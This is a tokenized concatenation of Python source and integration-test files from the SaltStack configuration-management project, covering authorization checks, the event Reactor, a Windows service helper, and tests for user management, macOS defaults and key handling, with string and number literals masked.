) <EOL> return auth_list <EOL> def wheel_check ( self , auth_list , fun ) : <EOL> '''<STR_LIT>''' <EOL> comps = fun . split ( '<STR_LIT:.>' ) <EOL> if len ( comps ) != <NUM_LIT:2> : <EOL> return False <EOL> mod = comps [ <NUM_LIT:0> ] <EOL> fun = comps [ <NUM_LIT:1> ] <EOL> for ind in auth_list : <EOL> if isinstance ( ind , six . string_types ) : <EOL> if ind . startswith ( '<STR_LIT:@>' ) and ind [ <NUM_LIT:1> : ] == mod : <EOL> return True <EOL> if ind == '<STR_LIT>' : <EOL> return True <EOL> if ind == '<STR_LIT>' : <EOL> return True <EOL> elif isinstance ( ind , dict ) : <EOL> if len ( ind ) != <NUM_LIT:1> : <EOL> continue <EOL> valid = next ( six . iterkeys ( ind ) ) <EOL> if valid . startswith ( '<STR_LIT:@>' ) and valid [ <NUM_LIT:1> : ] == mod : <EOL> if isinstance ( ind [ valid ] , six . string_types ) : <EOL> if self . match_check ( ind [ valid ] , fun ) : <EOL> return True <EOL> elif isinstance ( ind [ valid ] , list ) : <EOL> for regex in ind [ valid ] : <EOL> if self . match_check ( regex , fun ) : <EOL> return True <EOL> return False <EOL> def runner_check ( self , auth_list , fun ) : <EOL> '''<STR_LIT>''' <EOL> comps = fun . split ( '<STR_LIT:.>' ) <EOL> if len ( comps ) != <NUM_LIT:2> : <EOL> return False <EOL> mod = comps [ <NUM_LIT:0> ] <EOL> fun = comps [ <NUM_LIT:1> ] <EOL> for ind in auth_list : <EOL> if isinstance ( ind , six . string_types ) : <EOL> if ind . startswith ( '<STR_LIT:@>' ) and ind [ <NUM_LIT:1> : ] == mod : <EOL> return True <EOL> if ind == '<STR_LIT>' : <EOL> return True <EOL> if ind == '<STR_LIT>' : <EOL> return True <EOL> elif isinstance ( ind , dict ) : <EOL> if len ( ind ) != <NUM_LIT:1> : <EOL> continue <EOL> valid = next ( six . iterkeys ( ind ) ) <EOL> if valid . startswith ( '<STR_LIT:@>' ) and valid [ <NUM_LIT:1> : ] == mod : <EOL> if isinstance ( ind [ valid ] , six . string_types ) : <EOL> if self . match_check ( ind [ valid ] , fun ) : <EOL> return True <EOL> elif isinstance ( ind [ valid ] , list ) : <EOL> for regex in ind [ valid ] : <EOL> if self . match_check ( regex , fun ) : <EOL> return True <EOL> return False <EOL> def spec_check ( self , auth_list , fun , form ) : <EOL> '''<STR_LIT>''' <EOL> if form != '<STR_LIT>' : <EOL> comps = fun . split ( '<STR_LIT:.>' ) <EOL> if len ( comps ) != <NUM_LIT:2> : <EOL> return False <EOL> mod = comps [ <NUM_LIT:0> ] <EOL> fun = comps [ <NUM_LIT:1> ] <EOL> else : <EOL> mod = fun <EOL> for ind in auth_list : <EOL> if isinstance ( ind , six . string_types ) : <EOL> if ind . startswith ( '<STR_LIT:@>' ) and ind [ <NUM_LIT:1> : ] == mod : <EOL> return True <EOL> if ind == '<STR_LIT>' . format ( form ) : <EOL> return True <EOL> if ind == '<STR_LIT>' . format ( form ) : <EOL> return True <EOL> elif isinstance ( ind , dict ) : <EOL> if len ( ind ) != <NUM_LIT:1> : <EOL> continue <EOL> valid = next ( six . iterkeys ( ind ) ) <EOL> if valid . startswith ( '<STR_LIT:@>' ) and valid [ <NUM_LIT:1> : ] == mod : <EOL> if isinstance ( ind [ valid ] , six . string_types ) : <EOL> if self . match_check ( ind [ valid ] , fun ) : <EOL> return True <EOL> elif isinstance ( ind [ valid ] , list ) : <EOL> for regex in ind [ valid ] : <EOL> if self . match_check ( regex , fun ) : <EOL> return True <EOL> return False <EOL> def mine_get ( tgt , fun , tgt_type = '<STR_LIT>' , opts = None ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> serial = salt . payload . Serial ( opts ) <EOL> checker = salt . utils . minions . CkMinions ( opts ) <EOL> minions = checker . check_minions ( <EOL> tgt , <EOL> tgt_type ) <EOL> for minion in minions : <EOL> mine = os . path . join ( <EOL> opts [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' , <EOL> minion , <EOL> '<STR_LIT>' ) <EOL> try : <EOL> with salt . utils . fopen ( mine , '<STR_LIT:rb>' ) as fp_ : <EOL> fdata = serial . load ( fp_ ) . get ( fun ) <EOL> if fdata : <EOL> ret [ minion ] = fdata <EOL> except Exception : <EOL> continue <EOL> return ret </s>
<s> from __future__ import absolute_import <EOL> import fnmatch <EOL> import glob <EOL> import logging <EOL> import yaml <EOL> import salt . runner <EOL> import salt . state <EOL> import salt . utils <EOL> import salt . utils . cache <EOL> import salt . utils . event <EOL> import salt . utils . process <EOL> import salt . defaults . exitcodes <EOL> from salt . ext . six import string_types , iterkeys <EOL> from salt . _compat import string_types <EOL> log = logging . getLogger ( __name__ ) <EOL> class Reactor ( salt . utils . process . SignalHandlingMultiprocessingProcess , salt . state . Compiler ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , opts , log_queue = None ) : <EOL> super ( Reactor , self ) . __init__ ( log_queue = log_queue ) <EOL> local_minion_opts = opts . copy ( ) <EOL> local_minion_opts [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . minion = salt . minion . MasterMinion ( local_minion_opts ) <EOL> salt . state . Compiler . __init__ ( self , opts , self . minion . rend ) <EOL> def __setstate__ ( self , state ) : <EOL> self . _is_child = True <EOL> Reactor . __init__ ( <EOL> self , state [ '<STR_LIT>' ] , <EOL> log_queue = state [ '<STR_LIT>' ] ) <EOL> def __getstate__ ( self ) : <EOL> return { '<STR_LIT>' : self . opts , <EOL> '<STR_LIT>' : self . log_queue } <EOL> def render_reaction ( self , glob_ref , tag , data ) : <EOL> '''<STR_LIT>''' <EOL> react = { } <EOL> if glob_ref . startswith ( '<STR_LIT>' ) : <EOL> glob_ref = self . minion . functions [ '<STR_LIT>' ] ( glob_ref ) <EOL> for fn_ in glob . glob ( glob_ref ) : <EOL> try : <EOL> res = self . render_template ( <EOL> fn_ , <EOL> tag = tag , <EOL> data = data ) <EOL> for name in res : <EOL> res [ name ] [ '<STR_LIT>' ] = fn_ <EOL> react . update ( res ) <EOL> except Exception : <EOL> log . error ( '<STR_LIT>' . format ( fn_ ) , exc_info = True ) <EOL> return react <EOL> def list_reactors ( self , tag ) : <EOL> '''<STR_LIT>''' <EOL> log . debug ( '<STR_LIT>' . format ( tag ) ) <EOL> reactors = [ ] <EOL> if isinstance ( self . opts [ '<STR_LIT>' ] , string_types ) : <EOL> try : <EOL> with salt . utils . fopen ( self . opts [ '<STR_LIT>' ] ) as fp_ : <EOL> react_map = yaml . safe_load ( fp_ . read ( ) ) <EOL> except ( OSError , IOError ) : <EOL> log . error ( <EOL> '<STR_LIT>' . format ( <EOL> self . opts [ '<STR_LIT>' ] <EOL> ) <EOL> ) <EOL> except Exception : <EOL> log . error ( <EOL> '<STR_LIT>' . format ( <EOL> self . opts [ '<STR_LIT>' ] <EOL> ) <EOL> ) <EOL> else : <EOL> react_map = self . opts [ '<STR_LIT>' ] <EOL> for ropt in react_map : <EOL> if not isinstance ( ropt , dict ) : <EOL> continue <EOL> if len ( ropt ) != <NUM_LIT:1> : <EOL> continue <EOL> key = next ( iterkeys ( ropt ) ) <EOL> val = ropt [ key ] <EOL> if fnmatch . fnmatch ( tag , key ) : <EOL> if isinstance ( val , string_types ) : <EOL> reactors . append ( val ) <EOL> elif isinstance ( val , list ) : <EOL> reactors . extend ( val ) <EOL> return reactors <EOL> def list_all ( self ) : <EOL> '''<STR_LIT>''' <EOL> if isinstance ( self . minion . opts [ '<STR_LIT>' ] , string_types ) : <EOL> log . debug ( '<STR_LIT>' . format ( self . opts [ '<STR_LIT>' ] ) ) <EOL> try : <EOL> with salt . utils . fopen ( self . opts [ '<STR_LIT>' ] ) as fp_ : <EOL> react_map = yaml . safe_load ( fp_ . read ( ) ) <EOL> except ( OSError , IOError ) : <EOL> log . error ( <EOL> '<STR_LIT>' . format ( <EOL> self . opts [ '<STR_LIT>' ] <EOL> ) <EOL> ) <EOL> except Exception : <EOL> log . error ( <EOL> '<STR_LIT>' . format ( <EOL> self . opts [ '<STR_LIT>' ] <EOL> ) <EOL> ) <EOL> else : <EOL> log . debug ( '<STR_LIT>' ) <EOL> react_map = self . minion . opts [ '<STR_LIT>' ] <EOL> return react_map <EOL> def add_reactor ( self , tag , reaction ) : <EOL> '''<STR_LIT>''' <EOL> reactors = self . list_all ( ) <EOL> for reactor in reactors : <EOL> _tag = next ( iterkeys ( reactor ) ) <EOL> if _tag == tag : <EOL> return { '<STR_LIT:status>' : False , '<STR_LIT>' : '<STR_LIT>' } <EOL> self . minion . opts [ '<STR_LIT>' ] . append ( { tag : reaction } ) <EOL> return { '<STR_LIT:status>' : True , '<STR_LIT>' : '<STR_LIT>' } <EOL> def delete_reactor ( self , tag ) : <EOL> '''<STR_LIT>''' <EOL> reactors = self . list_all ( ) <EOL> for reactor in reactors : <EOL> _tag = next ( iterkeys ( reactor ) ) <EOL> if _tag == tag : <EOL> self . minion . opts [ '<STR_LIT>' ] . remove ( reactor ) <EOL> return { '<STR_LIT:status>' : True , '<STR_LIT>' : '<STR_LIT>' } <EOL> return { '<STR_LIT:status>' : False , '<STR_LIT>' : '<STR_LIT>' } <EOL> def reactions ( self , tag , data , reactors ) : <EOL> '''<STR_LIT>''' <EOL> log . debug ( '<STR_LIT>' . format ( tag ) ) <EOL> high = { } <EOL> chunks = [ ] <EOL> try : <EOL> for fn_ in reactors : <EOL> high . update ( self . render_reaction ( fn_ , tag , data ) ) <EOL> if high : <EOL> errors = self . verify_high ( high ) <EOL> if errors : <EOL> log . error ( ( '<STR_LIT>' <EOL> '<STR_LIT>' ) . format ( tag , errors , reactors ) ) <EOL> return [ ] <EOL> chunks = self . order_chunks ( self . compile_high_data ( high ) ) <EOL> except Exception as exc : <EOL> log . error ( '<STR_LIT>' . format ( exc ) , exc_info = True ) <EOL> return chunks <EOL> def call_reactions ( self , chunks ) : <EOL> '''<STR_LIT>''' <EOL> for chunk in chunks : <EOL> self . wrap . run ( chunk ) <EOL> def run ( self ) : <EOL> '''<STR_LIT>''' <EOL> salt . utils . appendproctitle ( self . __class__ . __name__ ) <EOL> self . event = salt . utils . event . get_event ( <EOL> self . opts [ '<STR_LIT>' ] , <EOL> self . opts [ '<STR_LIT>' ] , <EOL> self . opts [ '<STR_LIT>' ] , <EOL> opts = self . opts , <EOL> listen = True ) <EOL> self . wrap = ReactWrap ( self . opts ) <EOL> for data in self . event . iter_events ( full = True ) : <EOL> if data [ '<STR_LIT:data>' ] . get ( '<STR_LIT:user>' ) == self . wrap . event_user : <EOL> continue <EOL> if data [ '<STR_LIT>' ] . endswith ( '<STR_LIT>' ) : <EOL> _data = data [ '<STR_LIT:data>' ] <EOL> res = self . add_reactor ( _data [ '<STR_LIT>' ] , _data [ '<STR_LIT>' ] ) <EOL> self . event . fire_event ( { '<STR_LIT>' : self . list_all ( ) , <EOL> '<STR_LIT:result>' : res } , <EOL> '<STR_LIT>' ) <EOL> elif data [ '<STR_LIT>' ] . endswith ( '<STR_LIT>' ) : <EOL> _data = data [ '<STR_LIT:data>' ] <EOL> res = self . delete_reactor ( _data [ '<STR_LIT>' ] ) <EOL> self . event . fire_event ( { '<STR_LIT>' : self . list_all ( ) , <EOL> '<STR_LIT:result>' : res } , <EOL> '<STR_LIT>' ) <EOL> elif data [ '<STR_LIT>' ] . endswith ( '<STR_LIT>' ) : <EOL> self . event . fire_event ( { '<STR_LIT>' : self . list_all ( ) } , <EOL> '<STR_LIT>' ) <EOL> else : <EOL> reactors = self . list_reactors ( data [ '<STR_LIT>' ] ) <EOL> if not reactors : <EOL> continue <EOL> chunks = self . reactions ( data [ '<STR_LIT>' ] , data [ '<STR_LIT:data>' ] , reactors ) <EOL> if chunks : <EOL> try : <EOL> self . call_reactions ( chunks ) <EOL> except SystemExit : <EOL> log . warning ( '<STR_LIT>' ) <EOL> class ReactWrap ( object ) : <EOL> '''<STR_LIT>''' <EOL> client_cache = None <EOL> event_user = '<STR_LIT>' <EOL> def __init__ ( self , opts ) : <EOL> self . opts = opts <EOL> if ReactWrap . client_cache is None : <EOL> ReactWrap . client_cache = salt . utils . cache . CacheDict ( opts [ '<STR_LIT>' ] ) <EOL> self . pool = salt . utils . process . ThreadPool ( <EOL> self . opts [ '<STR_LIT>' ] , <EOL> queue_size = self . opts [ '<STR_LIT>' ] <EOL> ) <EOL> def run ( self , low ) : <EOL> '''<STR_LIT>''' <EOL> l_fun = getattr ( self , low [ '<STR_LIT:state>' ] ) <EOL> try : <EOL> f_call = salt . utils . format_call ( l_fun , low ) <EOL> kwargs = f_call . get ( '<STR_LIT>' , { } ) <EOL> if low [ '<STR_LIT:state>' ] in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> kwargs [ '<STR_LIT>' ] = self . event_user <EOL> l_fun ( * f_call . get ( '<STR_LIT:args>' , ( ) ) , ** kwargs ) <EOL> except Exception : <EOL> log . error ( <EOL> '<STR_LIT>' . format ( low [ '<STR_LIT:state>' ] , l_fun ) , <EOL> exc_info = True <EOL> ) <EOL> def local ( self , * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT>' not in self . client_cache : <EOL> self . client_cache [ '<STR_LIT>' ] = salt . client . LocalClient ( self . opts [ '<STR_LIT>' ] ) <EOL> try : <EOL> self . client_cache [ '<STR_LIT>' ] . cmd_async ( * args , ** kwargs ) <EOL> except SystemExit : <EOL> log . warning ( '<STR_LIT>' ) <EOL> except Exception as exc : <EOL> log . warning ( '<STR_LIT>' . format ( exc ) ) <EOL> cmd = local <EOL> def runner ( self , fun , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT>' not in self . client_cache : <EOL> self . client_cache [ '<STR_LIT>' ] = salt . runner . RunnerClient ( self . opts ) <EOL> try : <EOL> self . pool . fire_async ( self . client_cache [ '<STR_LIT>' ] . low , args = ( fun , kwargs ) ) <EOL> except SystemExit : <EOL> log . warning ( '<STR_LIT>' ) <EOL> except Exception as exc : <EOL> log . warning ( '<STR_LIT>' . format ( exc ) ) <EOL> def wheel ( self , fun , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT>' not in self . client_cache : <EOL> self . client_cache [ '<STR_LIT>' ] = salt . wheel . Wheel ( self . opts ) <EOL> try : <EOL> self . pool . fire_async ( self . client_cache [ '<STR_LIT>' ] . low , args = ( fun , kwargs ) ) <EOL> except SystemExit : <EOL> log . warning ( '<STR_LIT>' ) <EOL> except Exception as exc : <EOL> log . warning ( '<STR_LIT>' . format ( exc ) ) <EOL> def caller ( self , fun , * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> log . debug ( "<STR_LIT>" . format ( fun , args , kwargs ) ) <EOL> args = kwargs [ '<STR_LIT:args>' ] <EOL> if '<STR_LIT>' not in self . client_cache : <EOL> self . client_cache [ '<STR_LIT>' ] = salt . client . Caller ( self . opts [ '<STR_LIT>' ] ) <EOL> try : <EOL> self . client_cache [ '<STR_LIT>' ] . function ( fun , * args ) <EOL> except SystemExit : <EOL> log . warning ( '<STR_LIT>' ) <EOL> except Exception as exc : <EOL> log . warning ( '<STR_LIT>' . format ( exc ) ) </s>
<s> from __future__ import print_function <EOL> from __future__ import absolute_import <EOL> from os . path import splitext , abspath <EOL> from sys import modules <EOL> import win32serviceutil <EOL> import win32service <EOL> import win32event <EOL> import win32api <EOL> class Service ( win32serviceutil . ServiceFramework ) : <EOL> _svc_name_ = '<STR_LIT>' <EOL> _svc_display_name_ = '<STR_LIT>' <EOL> def __init__ ( self , * args ) : <EOL> win32serviceutil . ServiceFramework . __init__ ( self , * args ) <EOL> self . log ( '<STR_LIT>' ) <EOL> self . stop_event = win32event . CreateEvent ( None , <NUM_LIT:0> , <NUM_LIT:0> , None ) <EOL> def log ( self , msg ) : <EOL> import servicemanager <EOL> servicemanager . LogInfoMsg ( str ( msg ) ) <EOL> def sleep ( self , sec ) : <EOL> win32api . Sleep ( sec * <NUM_LIT:1000> , True ) <EOL> def SvcDoRun ( self ) : <EOL> self . ReportServiceStatus ( win32service . SERVICE_START_PENDING ) <EOL> try : <EOL> self . ReportServiceStatus ( win32service . SERVICE_RUNNING ) <EOL> self . log ( '<STR_LIT:start>' ) <EOL> self . start ( ) <EOL> self . log ( '<STR_LIT>' ) <EOL> win32event . WaitForSingleObject ( self . stop_event , <EOL> win32event . INFINITE ) <EOL> self . log ( '<STR_LIT>' ) <EOL> except Exception as err : <EOL> self . log ( '<STR_LIT>' . format ( err ) ) <EOL> self . SvcStop ( ) <EOL> def SvcStop ( self ) : <EOL> self . ReportServiceStatus ( win32service . SERVICE_STOP_PENDING ) <EOL> self . log ( '<STR_LIT>' ) <EOL> self . stop ( ) <EOL> self . log ( '<STR_LIT>' ) <EOL> win32event . SetEvent ( self . stop_event ) <EOL> self . ReportServiceStatus ( win32service . SERVICE_STOPPED ) <EOL> def start ( self ) : <EOL> pass <EOL> def stop ( self ) : <EOL> pass <EOL> def instart ( cls , name , display_name = None , stay_alive = True ) : <EOL> '''<STR_LIT>''' <EOL> cls . _svc_name_ = name <EOL> cls . _svc_display_name_ = display_name or name <EOL> try : <EOL> module_path = modules [ cls . __module__ ] . __file__ <EOL> except AttributeError : <EOL> from sys import executable <EOL> module_path = executable <EOL> module_file = splitext ( abspath ( module_path ) ) [ <NUM_LIT:0> ] <EOL> cls . _svc_reg_class_ = '<STR_LIT>' . format ( module_file , cls . __name__ ) <EOL> if stay_alive : <EOL> win32api . SetConsoleCtrlHandler ( lambda x : True , True ) <EOL> try : <EOL> win32serviceutil . InstallService ( <EOL> cls . _svc_reg_class_ , <EOL> cls . _svc_name_ , <EOL> cls . _svc_display_name_ , <EOL> startType = win32service . SERVICE_AUTO_START <EOL> ) <EOL> print ( '<STR_LIT>' ) <EOL> win32serviceutil . StartService ( <EOL> cls . _svc_name_ <EOL> ) <EOL> print ( '<STR_LIT>' ) <EOL> except Exception as err : <EOL> print ( str ( err ) ) </s>
<s> from __future__ import absolute_import <EOL> from salttesting . helpers import ensure_in_syspath <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> import integration <EOL> class TestSyndic ( integration . SyndicCase ) : <EOL> '''<STR_LIT>''' <EOL> def test_ping ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . assertTrue ( self . run_function ( '<STR_LIT>' ) ) <EOL> def test_fib ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . assertEqual ( <EOL> self . run_function ( <EOL> '<STR_LIT>' , <EOL> [ '<STR_LIT>' ] , <EOL> ) [ <NUM_LIT:0> ] , <EOL> <NUM_LIT> <EOL> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( TestSyndic ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> from salttesting . helpers import ensure_in_syspath <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> import integration <EOL> class LoaderOverridesTest ( integration . ModuleCase ) : <EOL> def test_overridden_internal ( self ) : <EOL> funcs = self . run_function ( '<STR_LIT>' ) <EOL> self . assertIn ( '<STR_LIT>' , funcs ) <EOL> self . assertNotIn ( '<STR_LIT>' , funcs ) <EOL> self . assertIn ( '<STR_LIT>' , funcs ) <EOL> text = '<STR_LIT>' <EOL> self . assertEqual ( <EOL> self . run_function ( '<STR_LIT>' , arg = [ text ] ) [ : : - <NUM_LIT:1> ] , <EOL> self . run_function ( '<STR_LIT>' , arg = [ text ] ) , <EOL> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( LoaderOverridesTest ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import os <EOL> from salttesting import skipIf <EOL> from salttesting . helpers import ( <EOL> destructiveTest , <EOL> ensure_in_syspath , <EOL> requires_system_grains <EOL> ) <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> import integration <EOL> DEFAULT_DOMAIN = '<STR_LIT>' <EOL> DEFAULT_KEY = '<STR_LIT>' <EOL> DEFAULT_VALUE = '<STR_LIT:0>' <EOL> class MacDefaultsModuleTest ( integration . ModuleCase ) : <EOL> '''<STR_LIT>''' <EOL> def setUp ( self ) : <EOL> '''<STR_LIT>''' <EOL> os_grain = self . run_function ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> if os_grain [ '<STR_LIT>' ] not in '<STR_LIT>' : <EOL> self . skipTest ( <EOL> '<STR_LIT>' . format ( <EOL> ** os_grain <EOL> ) <EOL> ) <EOL> @ destructiveTest <EOL> @ skipIf ( os . geteuid ( ) != <NUM_LIT:0> , '<STR_LIT>' ) <EOL> @ requires_system_grains <EOL> def test_macdefaults_write_read ( self , grains = None ) : <EOL> '''<STR_LIT>''' <EOL> write_domain = self . run_function ( '<STR_LIT>' , <EOL> [ DEFAULT_DOMAIN , <EOL> DEFAULT_KEY , <EOL> DEFAULT_VALUE ] ) <EOL> self . assertTrue ( write_domain ) <EOL> read_domain = self . run_function ( '<STR_LIT>' , <EOL> [ DEFAULT_DOMAIN , <EOL> DEFAULT_KEY ] ) <EOL> self . assertTrue ( read_domain ) <EOL> self . assertEqual ( read_domain , DEFAULT_VALUE ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( MacDefaultsModuleTest ) </s>
<s> from __future__ import absolute_import <EOL> import os <EOL> import string <EOL> import random <EOL> from salttesting import skipIf <EOL> from salttesting . helpers import ( <EOL> destructiveTest , <EOL> ensure_in_syspath , <EOL> requires_system_grains <EOL> ) <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> import salt . utils <EOL> import integration <EOL> from salt . ext . six . moves import range <EOL> @ destructiveTest <EOL> @ skipIf ( os . geteuid ( ) != <NUM_LIT:0> , '<STR_LIT>' ) <EOL> @ skipIf ( not salt . utils . is_linux ( ) , '<STR_LIT>' ) <EOL> class UseraddModuleTest ( integration . ModuleCase ) : <EOL> def setUp ( self ) : <EOL> super ( UseraddModuleTest , self ) . setUp ( ) <EOL> os_grain = self . run_function ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> if os_grain [ '<STR_LIT>' ] not in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . skipTest ( <EOL> '<STR_LIT>' . format ( <EOL> ** os_grain <EOL> ) <EOL> ) <EOL> def __random_string ( self , size = <NUM_LIT:6> ) : <EOL> return '<STR_LIT>' + '<STR_LIT>' . join ( <EOL> random . choice ( string . ascii_uppercase + string . digits ) <EOL> for x in range ( size ) <EOL> ) <EOL> @ requires_system_grains <EOL> def test_groups_includes_primary ( self , grains = None ) : <EOL> uname = self . __random_string ( ) <EOL> if self . run_function ( '<STR_LIT>' , [ uname ] ) is not True : <EOL> self . run_function ( '<STR_LIT>' , [ uname , True , True ] ) <EOL> self . skipTest ( '<STR_LIT>' ) <EOL> try : <EOL> uinfo = self . run_function ( '<STR_LIT>' , [ uname ] ) <EOL> if grains [ '<STR_LIT>' ] in ( '<STR_LIT>' , ) : <EOL> self . assertIn ( '<STR_LIT>' , uinfo [ '<STR_LIT>' ] ) <EOL> else : <EOL> self . assertIn ( uname , uinfo [ '<STR_LIT>' ] ) <EOL> uid = uinfo [ '<STR_LIT>' ] <EOL> self . run_function ( '<STR_LIT>' , [ uname , True , True ] ) <EOL> gname = self . __random_string ( ) <EOL> if self . run_function ( '<STR_LIT>' , [ gname ] ) is not True : <EOL> self . run_function ( '<STR_LIT>' , [ gname , True , True ] ) <EOL> self . skipTest ( '<STR_LIT>' ) <EOL> ginfo = self . run_function ( '<STR_LIT>' , [ gname ] ) <EOL> if self . run_function ( '<STR_LIT>' , [ uname , uid , ginfo [ '<STR_LIT>' ] ] ) is False : <EOL> self . run_function ( '<STR_LIT>' , [ uname , True , True ] ) <EOL> self . skipTest ( '<STR_LIT>' ) <EOL> uinfo = self . run_function ( '<STR_LIT>' , [ uname ] ) <EOL> self . assertIn ( gname , uinfo [ '<STR_LIT>' ] ) <EOL> except AssertionError : <EOL> self . run_function ( '<STR_LIT>' , [ uname , True , True ] ) <EOL> raise <EOL> def test_linux_user_primary_group ( self , grains = None ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> if self . run_function ( '<STR_LIT>' , [ name ] ) is not True : <EOL> self . run_function ( '<STR_LIT>' , [ name ] ) <EOL> self . skipTest ( '<STR_LIT>' ) <EOL> try : <EOL> primary_group = self . run_function ( '<STR_LIT>' , [ name ] ) <EOL> uid_info = self . run_function ( '<STR_LIT>' , [ name ] ) <EOL> self . assertIn ( primary_group , uid_info [ '<STR_LIT>' ] ) <EOL> except : <EOL> self . run_function ( '<STR_LIT>' , [ name ] ) <EOL> raise <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( UseraddModuleTest ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import os <EOL> import yaml <EOL> import shutil <EOL> from salttesting . helpers import ensure_in_syspath <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> import integration <EOL> import salt . utils <EOL> class RunTest ( integration . ShellCase , integration . ShellCaseCommonTestsMixIn ) : <EOL> '''<STR_LIT>''' <EOL> _call_binary_ = '<STR_LIT>' <EOL> def test_in_docs ( self ) : <EOL> '''<STR_LIT>''' <EOL> data = self . run_run ( '<STR_LIT>' ) <EOL> data = '<STR_LIT:\n>' . join ( data ) <EOL> self . assertIn ( '<STR_LIT>' , data ) <EOL> self . assertIn ( '<STR_LIT>' , data ) <EOL> self . assertIn ( '<STR_LIT>' , data ) <EOL> self . assertIn ( '<STR_LIT>' , data ) <EOL> self . assertIn ( '<STR_LIT>' , data ) <EOL> self . assertIn ( '<STR_LIT>' , data ) <EOL> self . assertIn ( '<STR_LIT>' , data ) <EOL> def test_notin_docs ( self ) : <EOL> '''<STR_LIT>''' <EOL> data = self . run_run ( '<STR_LIT>' ) <EOL> data = '<STR_LIT:\n>' . join ( data ) <EOL> self . assertNotIn ( '<STR_LIT>' , data ) <EOL> def test_salt_documentation_too_many_arguments ( self ) : <EOL> '''<STR_LIT>''' <EOL> data = self . run_run ( '<STR_LIT>' , catch_stderr = True ) <EOL> self . assertIn ( '<STR_LIT>' , '<STR_LIT:\n>' . join ( data [ <NUM_LIT:1> ] ) ) <EOL> def test_issue_7754 ( self ) : <EOL> old_cwd = os . getcwd ( ) <EOL> config_dir = os . path . join ( integration . TMP , '<STR_LIT>' ) <EOL> if not os . path . isdir ( config_dir ) : <EOL> os . makedirs ( config_dir ) <EOL> os . chdir ( config_dir ) <EOL> config_file_name = '<STR_LIT>' <EOL> with salt . utils . fopen ( self . get_config_file_path ( config_file_name ) , '<STR_LIT:r>' ) as fhr : <EOL> config = yaml . load ( fhr . read ( ) ) <EOL> config [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> with salt . utils . fopen ( os . path . join ( config_dir , config_file_name ) , '<STR_LIT:w>' ) as fhw : <EOL> fhw . write ( <EOL> yaml . dump ( config , default_flow_style = False ) <EOL> ) <EOL> ret = self . run_script ( <EOL> self . _call_binary_ , <EOL> '<STR_LIT>' . format ( <EOL> config_dir <EOL> ) , <EOL> timeout = <NUM_LIT:15> , <EOL> catch_stderr = True , <EOL> with_retcode = True <EOL> ) <EOL> try : <EOL> self . assertIn ( "<STR_LIT>" , ret [ <NUM_LIT:0> ] ) <EOL> self . assertFalse ( os . path . isdir ( os . path . join ( config_dir , '<STR_LIT>' ) ) ) <EOL> except AssertionError : <EOL> if os . path . exists ( '<STR_LIT>' ) and ret [ <NUM_LIT:2> ] != <NUM_LIT:2> : <EOL> raise <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:\n>' . join ( ret [ <NUM_LIT:1> ] ) <EOL> ) <EOL> self . assertEqual ( ret [ <NUM_LIT:2> ] , <NUM_LIT:2> ) <EOL> finally : <EOL> self . chdir ( old_cwd ) <EOL> if os . path . isdir ( config_dir ) : <EOL> shutil . rmtree ( config_dir ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( RunTest ) </s>
<s> from __future__ import absolute_import <EOL> import integration <EOL> import salt . wheel <EOL> class KeyWheelModuleTest ( integration . TestCase , integration . AdaptedConfigurationTestCaseMixIn ) : <EOL> def setUp ( self ) : <EOL> self . wheel = salt . wheel . Wheel ( dict ( self . get_config ( '<STR_LIT>' ) ) ) <EOL> def test_list_all ( self ) : <EOL> ret = self . wheel . call_func ( '<STR_LIT>' ) <EOL> self . assertEqual ( ret , { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> } ) <EOL> def test_gen ( self ) : <EOL> ret = self . wheel . call_func ( '<STR_LIT>' , id_ = '<STR_LIT>' ) <EOL> self . assertIn ( '<STR_LIT>' , ret ) <EOL> self . assertIn ( '<STR_LIT>' , ret ) <EOL> self . assertTrue ( <EOL> ret . get ( '<STR_LIT>' , '<STR_LIT>' ) . startswith ( '<STR_LIT>' ) ) <EOL> self . assertTrue ( <EOL> ret . get ( '<STR_LIT>' , '<STR_LIT>' ) . startswith ( '<STR_LIT>' ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( KeyWheelModuleTest , needs_daemon = True ) </s>
